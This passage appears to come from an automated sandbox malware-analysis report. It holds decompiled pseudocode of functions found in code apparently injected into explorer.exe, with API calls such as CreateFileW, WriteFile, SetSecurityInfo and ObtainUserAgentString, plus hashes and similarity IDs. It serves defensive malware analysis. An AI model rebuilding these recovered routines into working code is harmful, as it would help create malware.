        				_t40 = E000C5A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
        				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
        				if(_t40 == 0) {
        					L9:
        					if(E000C2DCB() == 0) {
        						goto L11;
        					} else {
        						_t47 = _t47 | 0xffffffff;
        					}
        				} else {
        					_t45 =  *_t40;
        					_t30 = _t47;
        					if(_t45 == 0) {
        						goto L9;
        					} else {
        						_t44 =  *((intOrPtr*)(_t40 + 4));
        						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
        							_t30 = _t30 + 1;
        							if(_t30 < _t45) {
        								continue;
        							} else {
        								goto L9;
        							}
        							goto L12;
        						}
        						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
        							L11:
        							E000C4D6D(_t46, _t45, _t55);
        						} else {
        							goto L9;
        						}
        					}
        				}
        				L12:
        				E000CA39E();
        				E000CA39E();
        				return _t47;
        			}

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetDriveTypeW.KERNELBASE(?), ref: 000C5B4F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateDriveHeapType
        • String ID:
        • API String ID: 414167704-0
        • Opcode ID: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
        • Instruction ID: e8a148116833502842f1c4452d30bb54f46fd039dd188a520077a7abc4d715bb
        • Opcode Fuzzy Hash: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
        • Instruction Fuzzy Hash: EB21EB3C6006069BC714AFA4DC44FADB7B4FF48365B24812DE41587292EB31AC82CB95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 44%
        			E000CBC7A(void* __ecx, void* __edx) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				char _v24;
        				char _t18;
        				intOrPtr _t19;
        				intOrPtr _t27;
        				intOrPtr _t30;
        				intOrPtr _t36;
        				intOrPtr _t38;
        				char _t39;
        
        				_t39 = 0;
        				_t38 =  *0xde674; // 0x1e4
        				_v8 = 0;
        				_v12 = 0;
        				_v20 = 0;
        				_v16 = 0;
        				_t18 = E000C95E1(__ecx, 0x84b);
        				_push(0);
        				_v24 = _t18;
        				_push( &_v8);
        				_push(1);
        				_push(_t18);
        				_t19 =  *0xde68c; // 0x64fab8
        				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
        					_push( &_v16);
        					_push( &_v12);
        					_push( &_v20);
        					_t27 =  *0xde68c; // 0x64fab8
        					_push(_v8);
        					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
        						_push(_v12);
        						_t30 =  *0xde68c; // 0x64fab8
        						_push(0);
        						_push(0);
        						_push(0);
        						_push(0x10);
        						_push(6);
        						_push(_t38); // executed
        						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
        							_t39 = 1;
        						}
        					}
        					_t36 =  *0xde68c; // 0x64fab8
        					 *((intOrPtr*)(_t36 + 0x10))(_v8);
        				}
        				E000C85D5( &_v24);
        				return _t39;
        			}

        APIs
        • SetSecurityInfo.ADVAPI32(000001E4,00000006,00000010,00000000,00000000,00000000,?,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCE9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: InfoSecurity
        • String ID:
        • API String ID: 3528565900-0
        • Opcode ID: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
        • Instruction ID: a8e78ae5fe899e9e6dcb65718c11a878b9f3e22039a9cadb435a55c152528d81
        • Opcode Fuzzy Hash: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
        • Instruction Fuzzy Hash: 25112871A01119ABDB10EF95DC89EEEBBBCEF04740F1040AAB905E7191DB749A01CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 71%
        			E000CE450(void* __ecx, void* __edx) {
        				char _v8;
        				intOrPtr* _t5;
        				intOrPtr _t10;
        				intOrPtr* _t11;
        				void* _t12;
        
        				_push(__ecx);
        				_t5 =  *0xde6b0; // 0x25807e0
        				if( *_t5 == 0) {
        					_v8 = E000C95C7(0x2a7);
        					 *0xde788 = E000C91A6(_t6, 0);
        					E000C85C2( &_v8);
        					goto L4;
        				} else {
        					_v8 = 0x100;
        					_t10 = E000C8604(0x101);
        					 *0xde788 = _t10;
        					_t11 =  *0xde6b0; // 0x25807e0
        					_t12 =  *_t11(0, _t10,  &_v8); // executed
        					if(_t12 == 0) {
        						L4:
        						return 0;
        					} else {
        						return E000C861A(0xde788, 0xffffffff) | 0xffffffff;
        					}
        				}
        			}

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000CE4F7), ref: 000CE481
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Heap$AgentAllocateFreeObtainStringUser
        • String ID:
        • API String ID: 471734292-0
        • Opcode ID: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
        • Instruction ID: 8079f1387fde3651cf51c068454c49593d8a393480f3ea93dffd8e4335a106f5
        • Opcode Fuzzy Hash: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
        • Instruction Fuzzy Hash: 7DF06230609240EBF788EBB4DC4AF9D77E4AB15364F24425DE415DB2D2EFB499409628
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
        				long _v8;
        				void* _v12;
        				void* _t13;
        				void* _t21;
        				void* _t23;
        				void* _t26;
        
        				_t23 = __ecx;
        				_push(__ecx);
        				_push(__ecx);
        				_t26 = 0;
        				_v12 = __ecx;
        				_t21 = __edx;
        				if(_a4 == 0) {
        					L3:
        					_t13 = 1;
        				} else {
        					while(1) {
        						_v8 = _v8 & 0x00000000;
        						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
        							break;
        						}
        						_t26 = _t26 + _v8;
        						_t23 = _v12;
        						if(_t26 < _a4) {
        							continue;
        						} else {
        							goto L3;
        						}
        						goto L4;
        					}
        					_t13 = 0;
        				}
        				L4:
        				return _t13;
        			}

        APIs
        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
        • Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
        • Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CA5F7(WCHAR* __ecx, long __edx) {
        				intOrPtr _t6;
        				long _t12;
        				void* _t13;
        
        				_t12 = __edx;
        				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
        				if(_t13 != 0xffffffff) {
        					if(_t12 == 4) {
        						_t6 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
        					}
        					return _t13;
        				}
        				return 0;
        			}

        APIs
        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
        • Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
        • Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E000CA63B(WCHAR* __ecx) {
        				signed int _t5;
        
        				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
        				_t2 = _t5 + 1; // 0x1
        				asm("sbb ecx, ecx");
        				return _t5 &  ~_t2;
        			}

        APIs
        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
        • Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
        • Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C8604(long _a4) {
        				void* _t2;
        
        				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
        				return _t2;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
        • Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
        • Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CB269(WCHAR* __ecx) {
        
        				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
        			}



        0x000cb27c

        APIs
        • GetFileAttributesW.KERNELBASE(00000000,000C4E7B), ref: 000CB26F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
        • Instruction ID: e31c5f2542f69ce23b2b76098601bb74ace79624de71742bfcf3cc401eb3d774
        • Opcode Fuzzy Hash: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
        • Instruction Fuzzy Hash: E5B092B62210404BCA186B38998484D32909B1C2313220759B033CA0E1D624C8509A10
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C85EF() {
        				void* _t1;
        
        				_t1 = HeapCreate(0, 0x80000, 0); // executed
        				 *0xde768 = _t1;
        				return _t1;
        			}




        0x000c85f8
        0x000c85fe
        0x000c8603

        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
        • Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
        • Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000CF9BF(void* __edx) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				char _v24;
        				intOrPtr _t26;
        				char _t27;
        				intOrPtr _t29;
        				void* _t31;
        				void* _t36;
        				char _t38;
        				intOrPtr _t39;
        				char _t42;
        				intOrPtr _t51;
        				intOrPtr _t52;
        				intOrPtr* _t63;
        				intOrPtr _t66;
        				char* _t67;
        				intOrPtr _t69;
        				char _t78;
        				void* _t81;
        				void* _t82;
        
        				_t26 =  *0xde654; // 0x64fd30
        				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4))); // executed
        				_v12 = _t27;
        				if(_t27 != 0) {
        					_t63 =  *0xde654; // 0x64fd30
        					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
        						E000C86E1(_t27,  *_t63, 0x400);
        						_v8 = 0;
        						_t36 = E000C109A(_t63, 0x34a);
        						_t66 =  *0xde688; // 0xf0000
        						_t72 =  !=  ? 0x67d : 0x615;
        						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
        						_push(0);
        						_push(_t36);
        						_t67 = "\\";
        						_v24 = _t38;
        						_push(_t67);
        						_push(_t38);
        						_t39 =  *0xde688; // 0xf0000
        						_push(_t67);
        						_v20 = E000C92E5(_t39 + 0x1020);
        						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
        						_v16 = _t42;
        						E000C85D5( &_v24);
        						E000C85D5( &_v20);
        						_t73 = _v16;
        						_t82 = _t81 + 0x3c;
        						_t69 = _v8;
        						if(_v16 != 0 && _t69 > 0x400) {
        							_t51 =  *0xde654; // 0x64fd30
        							_t52 =  *((intOrPtr*)(_t51 + 4));
        							_t53 =  <  ? _t69 : _t52;
        							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
        							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
        							_t69 = _v8;
        							_t82 = _t82 + 0xc;
        						}
        						E000C861A( &_v16, _t69);
        						E000C861A( &_v20, 0xfffffffe);
        						_t27 = _v12;
        						_t81 = _t82 + 0x10;
        						_t63 =  *0xde654; // 0x64fd30
        					}
        					_t78 = 0;
        					while(1) {
        						_t29 =  *0xde688; // 0xf0000
        						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
        						_t81 = _t81 + 0xc;
        						if(_t31 >= 0) {
        							break;
        						}
        						Sleep(1);
        						_t78 = _t78 + 1;
        						if(_t78 < 0x2710) {
        							_t27 = _v12;
        							_t63 =  *0xde654; // 0x64fd30
        							continue;
        						}
        						break;
        					}
        					E000C861A( &_v12, 0); // executed
        				}
        				return 0;
        			}


























        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapSleep
        • String ID:
        • API String ID: 4201116106-0
        • Opcode ID: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
        • Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
        • Opcode Fuzzy Hash: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
        • Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E000C896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
        				char _v8;
        				WCHAR* _v12;
        				signed int _v16;
        				WCHAR* _v20;
        				short _t30;
        				short _t33;
        				intOrPtr _t38;
        				intOrPtr _t43;
        				intOrPtr _t45;
        				short _t49;
        				void* _t52;
        				char _t71;
        				WCHAR* _t72;
        
        				_v16 = _v16 & 0x00000000;
        				_t71 = 0;
        				_v12 = __ecx;
        				_t49 = __edx;
        				_v8 = 0;
        				_t72 = E000C8604(0x448);
        				_v20 = _t72;
        				_pop(_t52);
        				if(_t72 != 0) {
        					_t72[0x21a] = __edx;
        					_t72[0x21c] = _a8;
        					lstrcpynW(_t72, _v12, 0x200);
        					if(_t49 != 1) {
        						_t30 = E000C8604(0x100000);
        						_t72[0x212] = _t30;
        						if(_t30 != 0) {
        							_t69 = _a4;
        							_t72[0x216] = 0x100000;
        							if(_a4 != 0) {
        								E000C87EA(_t72, _t69);
        							}
        							L16:
        							return _t72;
        						}
        						L7:
        						if(_t71 != 0) {
        							E000C861A( &_v8, 0);
        						}
        						L9:
        						_t33 = _t72[0x218];
        						if(_t33 != 0) {
        							_t38 =  *0xde684; // 0x64f8f0
        							 *((intOrPtr*)(_t38 + 0x30))(_t33);
        						}
        						_t73 =  &(_t72[0x212]);
        						if(_t72[0x212] != 0) {
        							E000C861A(_t73, 0);
        						}
        						E000C861A( &_v20, 0);
        						goto L1;
        					}
        					_t43 = E000CA6A9(_t52, _v12,  &_v16); // executed
        					_t71 = _t43;
        					_v8 = _t71;
        					if(_t71 == 0) {
        						goto L9;
        					}
        					if(E000C8815(_t72, _t71, _v16, _a4) < 0) {
        						goto L7;
        					} else {
        						_t45 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
        						_t72[0x218] = _t72[0x218] & 0x00000000;
        						E000C861A( &_v8, 0);
        						goto L16;
        					}
        				}
        				L1:
        				return 0;
        			}

















        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000C89B9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcpyn
        • String ID:
        • API String ID: 680773602-0
        • Opcode ID: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
        • Instruction ID: f7af5643379fb798a10d9983aff7c2aee7eeb5d10f7fdca91578ae01a6c37180
        • Opcode Fuzzy Hash: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
        • Instruction Fuzzy Hash: 96318172A04304EFEB249BA5D845F9EB7E9EF44760F64842EF50597182DF30AA00875D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E000CE2C6(void* __fp0, intOrPtr _a4) {
        				char _v8;
        				char _v12;
        				char _v16;
        				char _v20;
        				void* _v24;
        				void* _v28;
        				char _v32;
        				char _v544;
        				signed int _t40;
        				intOrPtr _t41;
        				intOrPtr _t48;
        				intOrPtr _t58;
        				void* _t65;
        				intOrPtr _t66;
        				void* _t70;
        				signed int _t73;
        				void* _t75;
        				void* _t77;
        
        				_t77 = __fp0;
        				_v20 = 0;
        				_v28 = 0;
        				_v24 = 0;
        				_t66 =  *0xde6b4; // 0x64fa98, executed
        				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
        				if(_t40 == 0) {
        					_t73 = 0;
        					if(_v20 <= 0) {
        						L9:
        						_t41 =  *0xde6b4; // 0x64fa98
        						 *((intOrPtr*)(_t41 + 0xc))(_v8);
        						return 0;
        					}
        					do {
        						_v16 = 0;
        						_v12 = 0;
        						_t48 =  *0xde68c; // 0x64fab8
        						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
        						_t70 = E000C8604(_v16 + 1);
        						if(_t70 != 0) {
        							_v12 = 0x200;
        							_push( &_v32);
        							_push( &_v12);
        							_push( &_v544);
        							_push( &_v16);
        							_push(_t70);
        							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
        							_t58 =  *0xde68c; // 0x64fab8
        							_push(0);
        							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
        								E000C4905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
        								_t75 = _t75 + 0xc;
        								Sleep(0xa);
        							}
        						}
        						_t73 = _t73 + 1;
        					} while (_t73 < _v20);
        					goto L9;
        				}
        				return _t40 | 0xffffffff;
        			}






















        APIs
        • Sleep.KERNELBASE(0000000A), ref: 000CE394
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
        • Instruction ID: d27438c55f7a9eb286fce9ed97ab300969749f514a42abca27bfc32afb8dea28
        • Opcode Fuzzy Hash: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
        • Instruction Fuzzy Hash: 1A310DB5900158AFDB11DF94CD88EEFBBBCEB08350F1142AAB911E7291D730AE018B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CA3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
        				intOrPtr _v8;
        				signed int _v16;
        				char _v20;
        				void* _t24;
        				char _t25;
        				signed int _t30;
        				intOrPtr* _t45;
        				signed int _t46;
        				void* _t47;
        				void* _t54;
        
        				_t54 = __fp0;
        				_t45 = __edx;
        				_t46 = 0;
        				_t30 = __ecx;
        				if( *__edx > 0) {
        					do {
        						_t24 = E000C9ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
        						if(_t24 == 0) {
        							_t25 = E000C9749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
        							_v8 = _t25;
        							if(_t25 != 0) {
        								L6:
        								_v16 = _v16 & 0x00000000;
        								_v20 = _t25;
        								E000CA0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
        								_t47 = _t47 + 0xc;
        							} else {
        								if(GetLastError() != 0xd) {
        									_t25 = _v8;
        									goto L6;
        								} else {
        									E000C9F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
        								}
        							}
        						}
        						_t46 = _t46 + 1;
        					} while (_t46 <  *_t45);
        				}
        				return 0;
        			}














        APIs
          • Part of subcall function 000C9749: SetLastError.KERNEL32(0000000D,00000000,00000000,000CA341,00000000,00000000,?,?,?,000C5AE1), ref: 000C9782
        • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000C4C60,?,?,00000000), ref: 000CA424
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ErrorLast
        • String ID:
        • API String ID: 1452528299-0
        • Opcode ID: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
        • Instruction ID: d7e6118cc00964f766b737b52ca09863481d2aae4fe2f29f29cc8711e36414d7
        • Opcode Fuzzy Hash: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
        • Instruction Fuzzy Hash: 71116175B0010AABCB14DF59C489F9EF3AAFB85719F20816DD80197242DB70ED05CBD1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E000C5D7D(void* __eflags) {
        				char _v44;
        				intOrPtr _t7;
        				intOrPtr _t10;
        				void* _t11;
        				WCHAR* _t12;
        				WCHAR* _t13;
        				WCHAR* _t14;
        				intOrPtr _t15;
        				intOrPtr _t19;
        				intOrPtr _t22;
        				void* _t27;
        				WCHAR* _t28;
        
        				_t7 =  *0xde688; // 0xf0000
        				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
        				_t10 =  *0xde684; // 0x64f8f0
        				_t28 = 2;
        				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
        				if(_t11 == 0) {
        					_t22 =  *0xde688; // 0xf0000
        					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
        					 *0xde6ac = _t12;
        					__eflags = _t12;
        					if(_t12 != 0) {
        						_t14 = E000C9EBB();
        						__eflags = _t14;
        						if(_t14 == 0) {
        							_t28 = 0;
        							__eflags = 0;
        						} else {
        							_t15 =  *0xde688; // 0xf0000
        							lstrcmpiW(_t15 + 0x228, _t14);
        							asm("sbb esi, esi");
        							_t28 = _t28 + 1;
        						}
        					}
        					_t13 = _t28;
        				} else {
        					_t19 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t19 + 0x30))(_t11);
        					_t13 = 3;
        				}
        				return _t13;
        			}
















        APIs
        • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcmpi
        • String ID:
        • API String ID: 1586166983-0
        • Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
        • Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CBA05() {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr _t15;
        				void* _t16;
        				void* _t18;
        				void* _t21;
        				intOrPtr _t22;
        				void* _t24;
        				void* _t30;
        
        				_v8 = _v8 & 0x00000000;
        				_t15 =  *0xde68c; // 0x64fab8
        				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
        				if(_t16 != 0) {
        					_v12 = _v12 & 0x00000000;
        					_t18 = E000CB998(1,  &_v12); // executed
        					_t30 = _t18;
        					if(_t30 != 0) {
        						CloseHandle(_v8);
        						_t21 = _t30;
        					} else {
        						if(_v8 != _t18) {
        							_t22 =  *0xde684; // 0x64f8f0
        							 *((intOrPtr*)(_t22 + 0x30))(_v8);
        						}
        						_t21 = 0;
        					}
        					return _t21;
        				} else {
        					return _t16;
        				}
        			}













        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
